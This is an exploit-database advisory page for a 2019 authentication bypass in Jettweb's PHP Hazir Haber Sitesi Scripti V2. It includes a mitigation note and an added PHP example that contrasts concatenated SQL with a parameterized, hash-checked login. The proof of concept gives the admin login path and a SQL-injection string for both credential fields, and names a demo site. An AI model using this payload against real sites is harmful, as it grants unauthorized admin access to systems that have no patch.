Vendor: PHP Hazir Haber Sitesi Scripti V2
By: Ahmet Ümit BAYRAM
CVSS: 5.5 (MEDIUM)
Authentication Bypass
CWE: 287
Product Name: PHP Hazir Haber Sitesi Scripti V2
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: NO
Related CWE:
CPE: a:jettweb:php_hazir_haber_sitesi_scripti_v2
Metasploit:
Other Scripts:
Platforms Tested: Kali Linux
2019

Jettweb PHP Hazir Haber Sitesi Scripti V2 – Authentication Bypass

This exploit allows an attacker to bypass authentication in the Jettweb PHP Hazir Haber Sitesi Scripti V2. By manipulating the username and password fields, an attacker can gain unauthorized access to the administration panel.

Mitigation:

The vendor should release a patch to fix the authentication bypass vulnerability. In the meantime, users can mitigate the risk by implementing strong passwords and using additional security measures such as IP whitelisting.
Source

Exploit-DB raw data:

# Exploit Title: Jettweb PHP Hazır Haber Sitesi Scripti V2 - Authentication Bypass
# Date: 25.03.2019
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://jettweb.net/u-6-php-hazir-haber-sitesi-scripti-v2.html
# Demo Site: http://haberv2.proemlaksitesi.net
# Version: V2
# Tested on: Kali Linux
# CVE: N/A

----- PoC: Authentication Bypass -----

Administration Panel: http://localhost/[PATH]/yonetim/admingiris.php
Username: '=' 'or'
Password: '=' 'or'
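
The quote characters in the PoC input only have an effect if the login form's fields are pasted into the SQL text of the credential check; the page does not show the script's code, so that cause is an assumption. The following is an added example, not the vendor's or the exploit author's code, contrasting that assumed pattern with a parameterized lookup and `password_verify()`. The `admins` table, its columns, the function names and the in-memory SQLite database (requires `pdo_sqlite`) are hypothetical stand-ins.

```php
<?php
// Added example: schema and names are hypothetical, sample data is constructed.
// An in-memory SQLite database stands in for the script's real database.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE admins (
    id INTEGER PRIMARY KEY, username TEXT UNIQUE, password_hash TEXT)');
$pdo->prepare('INSERT INTO admins (username, password_hash) VALUES (?, ?)')
    ->execute(['admin', password_hash('constructed-sample-password', PASSWORD_DEFAULT)]);

// Assumed vulnerable pattern: request fields concatenated into the SQL text.
// Returned as a string for inspection only; it is never executed here.
function unsafe_login_sql(string $user, string $pass): string
{
    return "SELECT id FROM admins WHERE username='$user' AND password='$pass'";
}

// Hardened form: the username is a bound parameter, so quotes in it stay data.
// The password never enters the query; it is checked against the stored hash.
function safe_login(PDO $pdo, string $user, string $pass): ?int
{
    $stmt = $pdo->prepare('SELECT id, password_hash FROM admins WHERE username = ?');
    $stmt->execute([$user]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    if ($row === false || !password_verify($pass, $row['password_hash'])) {
        return null; // unknown user or wrong password: same result for both
    }
    return (int) $row['id'];
}

$field = "'=' 'or'"; // the value the PoC on this page puts in both fields

// In the concatenated query the input's quotes end the string literals,
// so "=" and "or" are parsed as SQL operators instead of credential text.
echo unsafe_login_sql($field, $field), PHP_EOL;

// With binding, the same input is compared as an ordinary username string.
var_dump(safe_login($pdo, $field, $field));

// A real account with its correct password still authenticates.
var_dump(safe_login($pdo, 'admin', 'constructed-sample-password'));
```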